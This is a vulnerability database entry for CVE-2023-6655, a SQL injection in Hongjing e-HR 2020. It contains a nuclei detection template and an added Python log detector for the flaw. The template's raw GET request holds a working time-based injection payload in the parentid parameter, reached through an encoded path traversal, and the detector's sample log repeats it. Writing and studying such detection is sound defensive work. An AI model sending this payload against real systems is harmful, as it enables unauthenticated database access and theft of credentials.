Hongjing e-HR 2020 - SQL Injection

Published 03 Jul 2026 03:01:05. Reported by ProjectDiscovery. Type: nuclei. Source: github.com

Hongjing e-HR 2020 exposes remote SQL injection in loadhistroyorgtree via parentid.

Related entries

Reporter | Title | Published
Circl | CVE-2023-6655 | 19 Dec 2023 10:42
CNNVD | Hongjing e-HR SQL Injection Vulnerability | 10 Dec 2023 00:00
CVE | CVE-2023-6655 | 10 Dec 2023 15:31
Cvelist | CVE-2023-6655 Hongjing e-HR Login Interface loadhistroyorgtree sql injection | 10 Dec 2023 15:31
EUVD | EUVD-2023-58877 | 3 Oct 2025 20:07
NVD | CVE-2023-6655 | 10 Dec 2023 16:15
Prion | Sql injection | 10 Dec 2023 16:15
RedhatCVE | CVE-2023-6655 | 23 May 2025 02:07
VulnCheck KEV | VulnCheck KEV: CVE-2023-6655 | 7 Jun 2025 00:00
Vulnrichment | CVE-2023-6655 Hongjing e-HR Login Interface loadhistroyorgtree sql injection | 10 Dec 2023 15:31

Template
id: CVE-2023-6655

info:
  name: Hongjing e-HR 2020 - SQL Injection
  author: pussycat0x
  severity: high
  description: |
    A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries via the parentid parameter, potentially extracting sensitive database information including user credentials.
  remediation: |
    Update Hongjing e-HR to a version newer than 2020 that addresses this SQL injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6655
    - https://github.com/Gent5698/vulnerability/blob/main/%E5%AE%8F%E6%99%AF/CVE-2023-6655/README.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2023-6655
    cwe-id: CWE-89
    epss-score: 0.03766
    epss-percentile: 0.88594
    cpe: cpe:2.3:a:hrp2000:e-hr:2020:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: hrp2000
    product: e-hr
    fofa-query: title="人力资源信息管理系统"
  tags: cve,cve2023,hjsoft,management-system,sqli,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '/hcm/themes/')"
        condition: and
        internal: true

  - raw:
      - |
        GET /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--&kind=2&catalog_id=11&issuperuser=111&manageprive=111&action=111&target= HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate

    matchers:
      - type: dsl
        dsl:
          - "duration >= 6"
# digest: 4b0a00483046022100c1c3d1d1ed6b9d25a8401f8fe45f1e478004eca9d56242a3b882d6d285bf73fe022100a5a13ef66d6984c411400949e80df09df31c0b0682047b5e3cd8e31ae95d59ed:922c64590222798bb761d5b6d8e72950
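The template above confirms the flaw from the outside by measuring response delay. On the defending side the same request shape is easy to spot in web-server logs: the dot-segment encoding (%2e./.%2e) used to reach the endpoint through the unauthenticated oauthservlet prefix, plus SQL metacharacters or a time-delay construct in parentid. The following detector is an added example, not part of the Vulners page, the nuclei template, or ProjectDiscovery's code. It parses combined-format access-log lines (the sample lines and addresses are constructed) and reports each request to loadhistroyorgtree that carries those indicators, so a SOC can alert on attempts regardless of whether the server responded slowly.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
# Line 1 mirrors the template's probe, line 3 a non-time-based variant,
# lines 2 and 4 are benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2023:15:31:00 +0000] "GET /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--&kind=2 HTTP/1.1" 200 512
198.51.100.7 - - [10/Dec/2023:15:32:00 +0000] "GET /general/inform/org/loadhistroyorgtree?isroot=child&parentid=12 HTTP/1.1" 200 2048
203.0.113.5 - - [10/Dec/2023:15:33:00 +0000] "GET /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree?isroot=child&parentid=1%27+AND+1%3D1-- HTTP/1.1" 200 512
192.0.2.9 - - [10/Dec/2023:15:34:00 +0000] "GET /hcm/themes/default/style.css HTTP/1.1" 200 9001
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Quote, comment and statement-separator characters that have no place in a numeric id.
SQL_META_RE = re.compile(r"['\";]|--|/\*")
# Delay primitives used by time-based blind injection (the template's WAITFOR DELAY among them).
TIME_BASED_RE = re.compile(r"\bwaitfor\b|\bdelay\b|\bsleep\s*\(|\bpg_sleep\b|\bbenchmark\s*\(", re.I)


def analyze_target(target):
    """Inspect one request-target string; return the indicators found (empty if benign)."""
    parts = urlsplit(target)
    decoded_path = unquote(parts.path)
    # Only the affected endpoint is interesting; match on the decoded path so that
    # %2e-encoded segments cannot hide it.
    if not decoded_path.lower().endswith('/loadhistroyorgtree'):
        return []
    indicators = []
    # "%2e./.%2e" decodes to "../..": dot-segment traversal through the oauthservlet prefix.
    if '/..' in decoded_path:
        indicators.append('dot-segment traversal in path')
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values for us
    for value in params.get('parentid', []):
        if value.isdigit():
            continue  # a plain numeric id is the expected shape
        if SQL_META_RE.search(value):
            indicators.append('SQL metacharacters in parentid')
        if TIME_BASED_RE.search(value):
            indicators.append('time-based SQL payload in parentid')
    return indicators


def scan_log(text):
    """Parse access-log text; return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        indicators = analyze_target(m.group('target'))
        if indicators:
            findings.append({
                'ip': m.group('ip'),
                'ts': m.group('ts'),
                'status': int(m.group('status')),
                'indicators': indicators,
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']}: {', '.join(f['indicators'])}")
```

The traversal indicator is checked on the decoded path rather than on the raw string, so alternative encodings of the dot segments still trigger it; the parentid check deliberately accepts only digits as benign, which is the safest assumption for an organisation-tree id and avoids keyword false positives on ordinary values. A request that shows both indicators at once is a direct match for the template's probe and is worth a high-priority alert even when it returned 200 quickly.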


Scores (current as of 04 Feb 2026 07:00)

Vulners AI Score: 6.6 (medium risk)
CVSS 3.1: 7.3 - 9.8
CVSS 2: 7.5
CVSS 3: 7.3
EPSS: 0.03766
SSVC: 10